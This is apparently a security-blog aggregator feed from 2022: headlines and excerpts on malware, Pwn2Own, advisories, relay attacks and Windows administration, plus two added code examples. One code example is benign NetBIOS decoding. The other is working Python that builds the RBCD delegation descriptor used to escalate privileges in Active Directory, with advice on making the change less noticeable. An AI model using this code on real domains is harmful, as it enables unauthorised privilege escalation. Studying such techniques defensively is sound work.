
    Hijacking HijackThis
    Long before endpoint event logging became the norm, it was incredibly difficult to collect information about popular processes, services, paths, CLSIDs, etc. Antivirus companies, and later sandbox companies, had tons […]  ( 4 min )

    HackerOne Announces a New Customer Pentest Setup that's More Efficient and Speeds Time to Launch
    This improved experience reduces time to launch, which is vital when your organization is up against an urgent timeline to complete a pentest due to a  ( 4 min )

    Metastealer – filling the Racoon void
    MetaStealer is a new information stealer variant designed to fill the void left when Raccoon Stealer suspended operations in March of this year.  ( 5 min )
    earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts
    (The version of Ghidra used in this article is 10.1.2. For the Go string recovery tool release, skip ahead to Ghostrings Release.) Introduction A well-known issue with reverse engineering Go programs is that the lack of null terminators in Go strings makes recovering string definitions from compiled binaries difficult. Within a compiled Go program, many … Continue reading earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts →  ( 22 min )
    Tool Release – Ghostrings
    Introduction Ghostrings is a collection of Ghidra scripts for recovering string definitions in Go binaries with P-Code analysis. A well-known issue with reverse engineering Go programs is that the lack of null terminators in Go strings makes recovering string definitions from compiled binaries difficult. Within a compiled Go program, many of the constant string values … Continue reading Tool Release – Ghostrings →  ( 5 min )

    Start and stop a Hyper-V VM with PowerShell
    In my last article, we created a new VM for Kali Linux, mounted the ISO file to its virtual DVD drive, and changed the boot order so that the VM could boot from the virtual DVD drive. Here, I will show how to start and stop a Hyper-V VM with PowerShell. You'll also learn how to disable Secure Boot with PowerShell. Start and stop a Hyper-V VM with PowerShell first appeared on 4sysops.  ( 3 min )

    Galleon NTS-6002-GPS Command Injection vulnerability (CVE-2022-27224)
    TL;DR Galleon Systems’ GPS NTP time server had a command injection vulnerability in the firmware of their NTS GPS device that could allow total control of the device through the […] Galleon NTS-6002-GPS Command Injection vulnerability (CVE-2022-27224) first appeared on Pen Test Partners.  ( 5 min )


    CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware
    Software developers using GitLab CI are being targeted with malware through a typosquatting attack, putting downstream users at risk.  ( 6 min )

    Restore BitLocker-encrypted drives from image backup
    In this guide, I'll take a closer look at the process of restoring a BitLocker-encrypted drive from an image backup. Along the way, you'll learn about a solution for BitLocker backups that allows you to avoid re-encryption of the system drive after the restore. Restore BitLocker-encrypted drives from image backup first appeared on 4sysops.  ( 5 min )


    Pwn2Own Vancouver 2022 - The Results
    Pwn2Own Vancouver for 2022 is underway, and the 15th anniversary of the contest has already seen some amazing research demonstrated. Stay tuned to this blog for updated results, pictures, and videos from the event. We’ll be posting it all here, including the most recent Master of Pwn leaderboard. Master of Pwn standings current as of May 18, 17:00 Pacific. Day One - May 18, 2022. SUCCESS - Hector “p3rr0” Peralta was able to demonstrate an improper configuration against Microsoft Teams. He earns $150,000 and 15 Master of Pwn points. Hector “p3rr0” Peralta demonstrates an improper configuration bug on Microsoft Teams by launching calc. SUCCESS - Billy Jheng Bing-Jhong (@st424204), Muh…

    Understanding Public and Private Bug Bounties and Vulnerability Disclosure Programs
    How Are Bug Bounty Programs and Vulnerability Disclosure Programs Different? Let’s start with the similarities. Both bug bounties and VDPs aim to  ( 6 min )

    Detecting & Preventing Rogue Azure Subscriptions
    In this blog post we will cover why rogue subscriptions are problematic and revisit a solution published a couple of years ago on Microsoft's Tech Community. Finally, we will conclude with some hardening recommendations to restrict the creation and importation of Azure subscriptions.  ( 7 min )

    EntropyCapture: Simple Extraction of DPAPI Optional Entropy
    EntropyCapture extracts the DPAPI optional entropy using API hooking.  ( 3 min )

    When the trust relationship between a workstation and the primary AD domain fails
    If, at logon, you receive an error message that the trust relationship between the workstation and the primary domain failed, and you cannot log on, there are several ways to deal with the issue. These solutions also work on Windows 11 systems, where you may still be able to log on, but the network connections icon in the system tray claims that the computer is part of an unidentified network. When the trust relationship between a workstation and the primary AD domain fails first appeared on 4sysops.

    SANS MGT521 Security Culture Course – New Version Released
    Cybersecurity is no longer just about technology, it's about people.  ( 6 min )


    Pwn2Own Vancouver 2022 - The Schedule
    Welcome to Pwn2Own Vancouver 2022! This year marks the 15th anniversary of the contest, and we plan on celebrating by putting some amazing research on display. For this year’s event, we have 17 contestants attempting to exploit 21 targets across multiple categories. As always, we began our contest with a random drawing to determine the order of attempts. If you missed it, you can watch the replay here. The complete schedule for the contest is below (all times Pacific [GMT -7:00]). Note: All times subject to change - You can see the results and live updates here once they become available. Entries marked with a 📷 icon will be live-streamed on YouTube, Twitch, and Twitter. Wednesday, May 18, 2022 0930: Hector “p3rr0” Peralta targeting Microsoft Teams in the Enterprise Communications categ…

    Configure mailbox size and quota in Exchange 2016/2019 and Exchange Online
    Exchange administrators should know the maximum possible mailbox size in the environment they are managing, whether on-prem or in the cloud. In an on-prem installation, admins can use this information to prevent excessive database growth. In the cloud, excessive mailbox sizes might require an upgrade of the M365 plan. The configuration of the mailbox quota is possible both in the Exchange admin center (EAC) and via Exchange PowerShell. Configure mailbox size and quota in Exchange 2016/2019 and Exchange Online first appeared on 4sysops.  ( 6 min )

    Interactive decompilation with rellic-xref
    By Francesco Bertolaccini Rellic is a framework for analyzing and decompiling LLVM modules into C code, implementing the concepts described in the original paper presenting the Dream decompiler and its successor, Dream++. It recently made an appearance on this blog when I presented rellic-headergen, a tool for extracting debug metadata from LLVM modules and turning […]  ( 6 min )


    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    A guide to relaying credentials everywhere in 2022. NTLM relay is a well-known technique that has been with us for many years and never seems to go away. Almost every article about NTLM relay could start with that phrase. It could be a cliché, but it’s almost true. The first implementation of this attack dates […] The post We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere appeared first on SecureAuth.  ( 17 min )

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le  ( 3 min )

    How to create a Hyper-V VM with PowerShell
    In this new post of my Hyper-V management series, I will explain how to create a Hyper-V VM with PowerShell. How to create a Hyper-V VM with PowerShell first appeared on 4sysops.  ( 4 min )

    Got the security controls wrong in OT and maritime? Watch as engineers work around them
    Industrial control systems security is slowly improving, partly a result of attention from regulators and lawmakers. However, we often see security controls implemented that don’t take account of the unique […] Got the security controls wrong in OT and maritime? Watch as engineers work around them first appeared on Pen Test Partners.  ( 5 min )

    SANS Cybersecurity Leadership Curriculum
    Summary of SANS Cybersecurity Leadership Curriculum which is developing cyber security managers and leaders worldwide.  ( 9 min )


    Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks
    Summary The Kwikset/Weiser Kevo line of smart locks support Bluetooth Low Energy (BLE) passive entry through their Touch-to-Open functionality. When a user touches the exterior portion of the lock, the lock checks that an authorized BLE device is exterior to and within a short distance of the smart lock, and then performs a cryptographic handshake … Continue reading Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks →  ( 4 min )
    Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks
    Summary The Tesla Model 3 and Model Y employ a Bluetooth Low Energy (BLE) based passive entry system. This system allows users with an authorized mobile device or key fob within a short range of the vehicle to unlock and operate the vehicle, with no user interaction required on the mobile device or key fob. … Continue reading Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks →  ( 4 min )
    Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
    Summary Many products implement Bluetooth Low Energy (BLE) based proximity authentication, where the product unlocks or remains unlocked when a trusted BLE device is determined to be nearby. Common examples of such products include automotive Phone-as-a-Key systems, residential smart locks, BLE-based commercial building access control systems, and smartphones and laptops with trusted BLE device functionality. … Continue reading Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks →  ( 4 min )

    Update: base64dump.py Version 0.0.21
    This new version of base64dump adds decoding of NetBIOS name encoding with lowercase letters. base64dump_V0_0_21.zip (http) MD5: 5701B6D9691E366ED5E2EE6D06689012 SHA256: BE939E0225C83319A31A096DA29C1CA9D3C575DCCE9C1795814B335BD0871E92  ( 3 min )
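As an added illustration of the encoding that update targets (example code written for this page, not code from base64dump.py): RFC 1001 first-level encoding pads a NetBIOS name to 15 bytes, appends a one-byte service suffix, and writes each nibble of the 16 bytes as a letter 'A'..'P', so a name always becomes 32 letters; the lowercase variant uses 'a'..'p' instead. The encoder, decoder and scanner below are this example's own; the "log line" they run over is constructed, and the rule that a hit must be a run of exactly 32 such letters is this example's choice for cutting down false positives, not necessarily base64dump's.

```python
"""NetBIOS first-level name encoding (RFC 1001 section 14.1), upper-case and
lower-case variants, plus a scanner for encoded names in arbitrary bytes.
Added example; not part of base64dump.py."""
from __future__ import annotations
import re

NAME_LEN = 16                 # 15 name bytes plus one suffix byte
ENCODED_LEN = 2 * NAME_LEN    # one letter per nibble

# A few well-known suffix bytes and the service type each denotes.
SUFFIXES = {
    0x00: "workstation",
    0x03: "messenger",
    0x1B: "domain master browser",
    0x1C: "domain controller",
    0x20: "file server",
}


def netbios_encode(name: str, suffix: int = 0x00, lowercase: bool = False) -> str:
    """Pad to 15 bytes with spaces, append the suffix byte, then emit each
    nibble as a letter in 'A'..'P' (or 'a'..'p' for the lower-case variant)."""
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must be a single byte")
    raw = name.upper().encode("ascii")
    if len(raw) > NAME_LEN - 1:
        raise ValueError("NetBIOS names are at most 15 characters")
    raw = raw.ljust(NAME_LEN - 1, b" ") + bytes([suffix])
    base = ord("a") if lowercase else ord("A")
    return "".join(chr(base + (b >> 4)) + chr(base + (b & 0x0F)) for b in raw)


def netbios_decode(encoded: str) -> tuple[str, int]:
    """Reverse netbios_encode; returns (name, suffix).  Either case is
    accepted, but a mixed-case run is not a valid encoding and is rejected."""
    if len(encoded) != ENCODED_LEN:
        raise ValueError("encoded NetBIOS name must be 32 characters")
    if re.fullmatch(r"[A-P]{32}", encoded):
        base = ord("A")
    elif re.fullmatch(r"[a-p]{32}", encoded):
        base = ord("a")
    else:
        raise ValueError("not a NetBIOS first-level encoding")
    nibbles = [ord(c) - base for c in encoded]
    raw = bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))
    return raw[:-1].rstrip(b" ").decode("ascii"), raw[-1]


# A hit is exactly 32 letters from the 16-letter alphabet, all one case, and
# not embedded in a longer run of such letters (example's own heuristic).
_ENCODED_RE = re.compile(rb"(?<![A-Pa-p])(?:[A-P]{32}|[a-p]{32})(?![A-Pa-p])")


def find_netbios_names(data: bytes) -> list[tuple[int, str, int]]:
    """Scan bytes for encoded names; returns (offset, name, suffix) per hit."""
    hits = []
    for m in _ENCODED_RE.finditer(data):
        name, suffix = netbios_decode(m.group(0).decode("ascii"))
        hits.append((m.start(), name, suffix))
    return hits


# Constructed sample: a made-up log line carrying one upper-case and one
# lower-case encoded name.  Not real captured traffic.
SAMPLE = (b"query name=" + netbios_encode("DC01", 0x1C).encode()
          + b" peer=" + netbios_encode("FILESRV", 0x20, lowercase=True).encode()
          + b" rcode=0\n")

if __name__ == "__main__":
    for offset, name, suffix in find_netbios_names(SAMPLE):
        print(f"{offset:4d} {name!r:12} <{suffix:02X}> {SUFFIXES.get(suffix, 'unknown')}")
```

Running the block prints the two names recovered from the sample line with their suffix bytes; feeding it a carved memory region or a decoded payload instead of SAMPLE is the same call.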

    g_CiOptions in a Virtualized World
    With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced with an attacker set on escaping to Ring-0.  ( 8 min )


    Dragon and Knight
    For better or worse, however, not everyone processes conflict and competition the same way. This is where things get interesting (and potentially dangerous).

    LDAPSearch Reference
    ldapsearch is an extremely powerful tool, especially for Windows Active Directory enumeration. It’s one of my primary tools when performing pentesting or red teaming against an environment with Active Directory, but it is also handy to know because it often comes installed by default or as part of a base image, so it's a bit Living-Off-The-Land-esque. Another point in favour of ldapsearch is that it’s easy to forget that Active Directory isn’t the only LDAP server in most environments, and the ability to use a tool like this can come in extremely handy. If you want to find Active Directory LDAP servers, use the following command:
    $ dig -t SRV _ldap._tcp.dc._msdcs.sittingduck.info
    Basic Usage
    -x  Simple authentication (instead of SASL); you usually use this if you are going to include a username and password…  ( 8 min )

    Update: oledump.py Version 0.0.67
    This new version of oledump.py brings support for user-defined properties and an update to plugin plugin_msg_summary.py. Office documents with VSTO applications have user-defined properties. These properties can be extracted with my plugin plugin_metadata.py, but not with the current version of olefile. However, the development version of olefile can be used to extract these properties. […]  ( 3 min )

    Exploiting RBCD Using a Normal User Account*
    * Caveats apply. Resource-Based Constrained Delegation (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post, is a devious way of exploiting Kerberos to elevate privileges on a local Windows machine. All it requires is write access to the local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute and add another account's SID. You can then use that account with the Services for User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain, including local administrators. From there you can create a new service or whatever else you need to do. The key is how you write to the LDAP server under the local computer's domain account. There have been various approaches, usually abusing authen…  ( 5 min )
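What actually gets written to msDS-AllowedToActOnBehalfOfOtherIdentity is a self-relative security descriptor whose DACL lists the accounts allowed to delegate to the computer. The following is an added example in plain Python, written for this page rather than taken from the post or from any tool: it builds that descriptor for a list of SIDs, parses one back, and appends a SID without dropping accounts that are already listed. The structures follow MS-DTYP (SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE, SID); the owner BUILTIN\Administrators and the full-control mask 0xF01FF (983551) match what common RBCD tooling writes, but the code here is not that tooling. The SIDs used are made up.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity value used for
RBCD: a self-relative SECURITY_DESCRIPTOR (MS-DTYP 2.4.6) whose DACL holds one
ACCESS_ALLOWED_ACE per account allowed to delegate.  Added example; not the
post's code and not impacket's."""
from __future__ import annotations
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION = 0x02
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF             # 983551: the mask RBCD tooling grants
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
_SD_HEADER = "<BBHIIII"               # Revision, Sbz1, Control, Owner, Group, Sacl, Dacl offsets
_ACL_HEADER = "<BBHHH"                # AclRevision, Sbz1, AclSize, AceCount, Sbz2
_ACE_HEADER = "<BBHI"                 # AceType, AceFlags, AceSize, Mask


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1105' -> binary SID: revision, count, 48-bit big-endian
    identifier authority, then little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"malformed SID {sid!r}")
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data: bytes, offset: int) -> tuple[str, int]:
    """Parse a binary SID at offset; returns (SID string, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    if revision != 1:
        raise ValueError("unsupported SID revision")
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", data, offset + 8)
    return "-".join(["S", "1", str(authority), *map(str, subs)]), 8 + 4 * count


def build_rbcd_descriptor(sids: list[str]) -> bytes:
    """Self-relative SD: owner BUILTIN\\Administrators, no group, no SACL, and
    a DACL with one full-control ACCESS_ALLOWED_ACE per delegating account."""
    aces = b""
    for sid in sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = struct.calcsize(_ACE_HEADER) + len(sid_bytes)
        aces += struct.pack(_ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, FULL_CONTROL) + sid_bytes
    acl = struct.pack(_ACL_HEADER, ACL_REVISION, 0,
                      struct.calcsize(_ACL_HEADER) + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    owner_off = struct.calcsize(_SD_HEADER)
    header = struct.pack(_SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, owner_off + len(owner))
    return header + owner + acl


def parse_rbcd_descriptor(sd: bytes) -> list[tuple[str, int]]:
    """Return (SID, access mask) for every ACCESS_ALLOWED_ACE in the DACL."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from(_SD_HEADER, sd, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []                                # no DACL: nobody may delegate
    _, _, acl_size, ace_count, _ = struct.unpack_from(_ACL_HEADER, sd, dacl_off)
    pos, end = dacl_off + struct.calcsize(_ACL_HEADER), dacl_off + acl_size
    entries = []
    for _ in range(ace_count):
        if pos + struct.calcsize(_ACE_HEADER) > end:
            raise ValueError("truncated ACL")
        ace_type, _, ace_size, mask = struct.unpack_from(_ACE_HEADER, sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(sd, pos + struct.calcsize(_ACE_HEADER))
            entries.append((sid, mask))
        pos += ace_size                          # other ACE types are skipped by size
    return entries


def add_delegating_sid(current: bytes | None, sid: str) -> bytes:
    """Append a SID, keeping accounts already listed: overwriting the attribute
    breaks legitimate delegation and is a louder change than appending."""
    existing = [s for s, _ in parse_rbcd_descriptor(current)] if current else []
    if sid in existing:
        return current
    return build_rbcd_descriptor(existing + [sid])


if __name__ == "__main__":
    # Made-up SIDs for illustration; not from any real domain.
    attacker = "S-1-5-21-1111111111-2222222222-3333333333-1105"
    blob = add_delegating_sid(None, attacker)
    print(blob.hex())
    for sid, mask in parse_rbcd_descriptor(blob):
        print(f"{sid} mask=0x{mask:08X}")
```

The bytes returned by build_rbcd_descriptor or add_delegating_sid are what an LDAP modify would place in the attribute; reading the attribute first and passing it as current is the difference between adding an entry and silently replacing whatever delegation the computer already trusted. Parsing the value back is also the defender's side of the same check: any SID in that DACL can impersonate domain users to the host.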


    IIS Failed Request Tracing
    Failed Request Tracing is the most important IIS feature for diagnosing and troubleshooting request problems. It helps you determine exactly what is going on with your requests and why, provided you can reproduce the problem after enabling the Failed Request Tracing feature. IIS Failed Request Tracing first appeared on 4sysops.  ( 9 min )

    Hunting evasive vulnerabilities
    Do you ever wonder about the vulnerabilities you've missed? Why didn't they show themselves - and will they be discovered by somebody else later? Certain vulnerabilities have a knack for evading audit  ( 3 min )

    NVISO approved as APT Response Service Provider
    NVISO is proud to announce that it has successfully qualified as an APT Response service provider and is now recommended on the website of the German Federal Office for Information Security (BSI). Advanced Persistent Threats (APT) are typically described as attack campaigns in which highly skilled, often state-sponsored, intruders orchestrate targeted, long-term attacks. Due to their … Continue reading NVISO approved as APT Response Service Provider →  ( 3 min )

    Update: zipdump.py Version 0.0.22
    This is just a bugfix version. zipdump_v0_0_22.zip (http) MD5: 68F9F3809E4E1F9ADE4A4C3835CDF475 SHA256: 92ED372579001C826D5AF31615B8334CC798FF2DA4AF8B7C46267BF7D995C757  ( 3 min )


    Remove or block Chrome extensions with PowerShell
    A comment on the previous post about deploying Chrome extensions posed the question of whether PowerShell could be used to remove Chrome extensions. Remove or block Chrome extensions with PowerShell first appeared on 4sysops.  ( 6 min )

    SecureAuth Welcomes Apple, Google, and Microsoft’s Commitment to Passwordless by FIDO Alliance
    Earlier this week, Apple, Google, and Microsoft announced plans to expand support for a common passwordless sign-in standard created by the FIDO Alliance and the World Wide Web Consortium. We are excited about this announcement and applaud the players involved. It will accelerate momentum towards eliminating passwords entirely in the future. And to be a […] The post SecureAuth Welcomes Apple, Google, and Microsoft’s Commitment to Passwordless by FIDO Alliance   appeared first on SecureAuth.  ( 4 min )

    A Visual Summary of SANS Neurodiversity Summit 2022
    SANS Cybersecurity Blog pertaining to a summary of the SANS Neurodiversity in Cybersecurity Summit  ( 5 min )


    D-Link DIR-1260 GetDeviceSettings Pre-Auth Command Injection Vulnerability
    EIP-3b20d7b3 A command injection vulnerability exists within the web management interface of the D-Link DIR-1260 Wi-Fi router that allows unauthenticated attackers to execute arbitrary commands on the device with root privileges. The flaw specifically exists within the SetDest/Dest/Target arguments to the GetDeviceSettings form. The management interface is accessible over HTTP and HTTPS on the local ... The post D-Link DIR-1260 GetDeviceSettings Pre-Auth Command Injection Vulnerability appeared first on Exodus Intelligence.  ( 1 min )

    Putting Things in Context | Timelining Threat Campaigns
    Visualizing data is integral to threat research. See how we used this timeline analysis tool to track activity in the Ukrainian cyber conflict.  ( 7 min )

    Azure AD certificate-based user authentication
    Certificate-based authentication is an extremely robust and secure mechanism for validating a user's identity. However, until recently, you had to deploy Active Directory Federation Services (AD FS) to make it available for Azure AD. Microsoft has recently introduced an Azure AD certificate-based authentication service (Azure CBA), which significantly simplifies implementing certificate-based authentication. Azure AD certificate-based user authentication first appeared on 4sysops.  ( 6 min )

    Earn $200K by fuzzing for a weekend: Part 2
    Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.  ( 14 min )
    Earn $200K by fuzzing for a weekend: Part 1
    By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.  ( 33 min )

    Cloud Instance Metadata Services (IMDS)
    A misunderstood but deeply important feature to lock down when deploying workloads in cloud. Learn about Cloud Instance Metadata Services (IMDS) in this blog post.  ( 9 min )


    Release of Technical Report into the AMD Security Processor

    The May 2022 Security Update Review
    It’s the fifth second Tuesday of 2022, which also means it’s the fifth Patch Tuesday of the year, and it brings with it the latest security updates from Adobe and Microsoft. This is also the last release before Pwn2Own Vancouver, which means multiple participants will be holding their breath to see if their exploits still work or were patched out. Take a break from your regularly scheduled activities and join us as we review the details of their latest security offerings. Adobe Patches for May 2022. For May, Adobe released five bulletins addressing 18 CVEs in Adobe ColdFusion, InCopy, Framemaker, InDesign, and Adobe Character Animator. A total of 17 of these CVEs were reported by ZDI vulnerability researcher Mat Powell. The largest of these patches is the fix for Framemaker with 1…

    What is Attack Resistance Management?
    A Security Survey on How to Close Your Organization's Attack Resistance Gap  ( 6 min )

    How to check the PowerShell version
    It is important for an administrator to know which Windows PowerShell and PowerShell edition and version are installed on a system, especially because of script compatibility. This article covers all the ways to check the PowerShell version on Windows, Linux, and macOS and offers tips and tricks. I will also discuss the changes in PowerShell 7 and PowerShell 7.2. How to check the PowerShell version first appeared on 4sysops.  ( 5 min )


    Reflections on World Password Day: Are You Going Passwordless Yet?
    With all the talk about the growing obsolescence of passwords, it may seem strange that there exists such a thing as World Password Day. Aren’t we trying to move away from, rather than center on, passwords? This is, in fact, the real purpose of World Password Day: to draw attention to the increasing vulnerability of […] The post Reflections on World Password Day: Are You Going Passwordless Yet? appeared first on SecureAuth.  ( 5 min )

    Introducing pyCobaltHound – Let Cobalt Strike unleash the Hound
    Introduction During our engagements, red team operators often find themselves operating within complex Active Directory environments. The question then becomes finding the needle in the haystack that allows the red team to further escalate and/or reach their objectives. Luckily, the security community has already come up with ways to assist operators in answering these questions, … Continue reading Introducing pyCobaltHound – Let Cobalt Strike unleash the Hound →

    Enable detailed IIS errors
    By default, the IIS server is set to show detailed errors for local requests only, whereas it displays a custom error page for remote requests. This is done for security reasons, since detailed errors could reveal sensitive technical information about the web server and website. Enable detailed IIS errors first appeared on 4sysops.  ( 6 min )

    Constrained environment breakout. .NET Assembly exfiltration via Internet Options
    It’s not uncommon for developers to find that they need to help their end users. For starters, the business requirements for software can be highly convoluted and technical. Working with […] Constrained environment breakout. .NET Assembly exfiltration via Internet Options first appeared on Pen Test Partners.  ( 9 min )


    Update: cs-parse-traffic.py Version 0.0.5
    In this update for cs-parse-traffic.py, my tool to decrypt & parse Cobalt Strike traffic, I added some error handling. cs-parse-traffic_V0_0_5.zip (http) MD5: CFF6D97E816B23065F051D91B0F101A6 SHA256: 69763EB4D3A163824B417A0E23131B318F5E97198F255ECE449A65D4360C6302  ( 3 min )

    Beautiful Basics: Lesson 2
    Lesson 2 - Least Privilege. No one should have administrative access. All elevated access should be checked out when you need it and checked back in (automatically if possible), just like UAC. MFA should be required, proximity- or push-based. And every use of a break-glass account should be highly monitored. I think “Least Privilege” has been harped on at least … you know what, let me wager that you can’t find a single infosec or hacking conference from 2000 until now (2022) that doesn’t have 4 talks with the words “least privilege” in the talk. But maybe a handful out of all of those talks tell you how to accomplish such a feat. The Goal. Let's talk about the goal first …  ( 3 min )


    Beautiful Basics: Lesson 1
    Lesson 1 - YOU could be “Legacy”. Stop thinking that just because it did or didn’t work X way when you learned it, it still does or doesn’t. That could be 20 years ago. Technology changes faster than you do. I guess that’s a bit mean for a title, but here’s the thing: one of the greatest yet most challenging things about doing any job in technology is staying current. Everyone struggles to stay up to date with as much of what is going on around them. Many people specialize, which makes it easier to stay up to date with a specific thing. Yet that can lead to tunnel vision as well. All I’m trying to say here is that sometimes the person with the least amount of “experience” in a given technology field is going to have the most open mind to what is possible. No matter how long you have been in cyber security or technology in general, you should consider your knowledge on a specific topic a point-in-time piece of information. At that exact moment in your life, that fact was true. This doesn’t mean that it stays that way. Take passwords, for example. Everyone said “8-character passwords are secure” for decades. I’m still hearing that. Or “never write your passwords down”. This is just one example. “Never use X software, it’s insecure”: is it still? One of the ways I stay “current” is by always challenging my knowledge of how I think things should work vs. how they do. This is why during my keynote I noted when and where I learned these lessons; there is every possibility I am completely off base with all of them. This is also why it’s my beautiful basics lesson #1. Something to always keep top of mind.  ( 1 min )


    Attacking Systemic Security Risk, Part 1
    Our intent with FRAME is to bind the functions of model-based red teaming to security risk awareness across the extended enterprise. Among other things, we’re intentionally expanding the field of vision to include strategic and operational functions.

    Home-Grown Red Team: Creating A Red Team Development Workstation
    Having a good red team development workstation is essential for creating payloads, testing out new tools and keeping your work organized…  ( 7 min )

    Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)
    Summary Ruby on Rails is a web application framework that follows the Model-view-controller (MVC) pattern. It offers some protections against Cross-site scripting (XSS) attacks in its helpers for the views. Several tag helpers in ActionView::Helpers::FormTagHelper and ActionView::Helpers::TagHelper are vulnerable against XSS because their current protection does not restrict properly the set of characters allowed in … Continue reading Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777) →  ( 3 min )

    Disable Windows 11 widgets using Group Policy
    The widgets in Windows 11 are essentially the successors of News and interests, known from Windows 10. Like these, the widgets are often annoying in professional environments and therefore not desired. You can only completely disable Windows 11 widgets with Group Policy. Disable Windows 11 widgets using Group Policy first appeared on 4sysops.  ( 5 min )

    Signing and Encrypting with JSON Web Tokens
    Cryptographic weaknesses often arise in applications when the core security concepts are misunderstood or misused by developers. For this reason, a thorough review of all cryptographic implementations can be a juicy target when designing an application or starting a security assessment. Often, cryptography is used in the context of communication (e.g. a key exchange or […] The post Signing and Encrypting with JSON Web Tokens appeared first on Praetorian.  ( 9 min )


    Update: oledump.py Version 0.0.66
    This new version of oledump.py brings some fixes and an update to plugin plugin_vbaproject to decode and display the VBA project password when it is stored in plaintext. oledump_V0_0_66.zip (http) MD5: 20D89F0477ED7B533C2B0C6D27EC4255 SHA256: F67051EF2FA3FD42206C5ADFAC807C94ECD5F7F0F6427433B366217F675D3195  ( 3 min )

    Computer Account Relaying Vulnerabilities Part 2
    Overview Recently I’ve been working on writing a custom SMB client that implements the initial handshake and NTLM authentication functionality to perform port fingerprinting within Chariot Identify, our attack surface management product. While reading through the SMB specification, I got to thinking about Computer AdminTo Computer vulnerabilities we have exploited over the last few years […] The post Computer Account Relaying Vulnerabilities Part 2 appeared first on Praetorian.  ( 6 min )

    Vulnerabilities in Avast And AVG Put Millions At Risk
    Two high-severity flaws in popular end user security tools allow attackers to elevate privileges and compromise devices.  ( 5 min )

    How to install the PowerShell Active Directory module
    This guide has been updated for the latest Windows versions, Windows 11 and Windows Server 2022. You'll learn how to install the Active Directory (AD) module for PowerShell Core 6.0, PowerShell 7, and Windows PowerShell. For Windows PowerShell, the tutorial describes how to install the AD module on Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server 2008 R2, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, and Windows Server 2022. You'll also learn how to work with the AD module on other systems such as macOS or Linux with the help of PowerShell remoting. How to install the PowerShell Active Directory module first appeared on 4sysops.  ( 12 min )

    North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
    This blog post documents some of the actions taken during the initial access phase for an attack attributed to Lazarus, along with analysis of the malware that was utilised during this phase.  ( 5 min )

    8 Reasons You Don’t Want to Miss SANS ICS Security Summit & Training 2022
    ICS Security Summit & Training kicks off June 1. Register today.  ( 7 min )
    World Password Day – Readying Your Workforce for MFA
    Today is the perfect opportunity to talk about strong passwords.  ( 8 min )


    Learning Machine Learning Part 3: Attacking Black Box Models
    In the first post in this series we covered a brief background on machine learning, the Revoke-Obfuscation approach for detecting…  ( 19 min )

    What to Expect when Exploiting: A Guide to Pwn2Own Participation
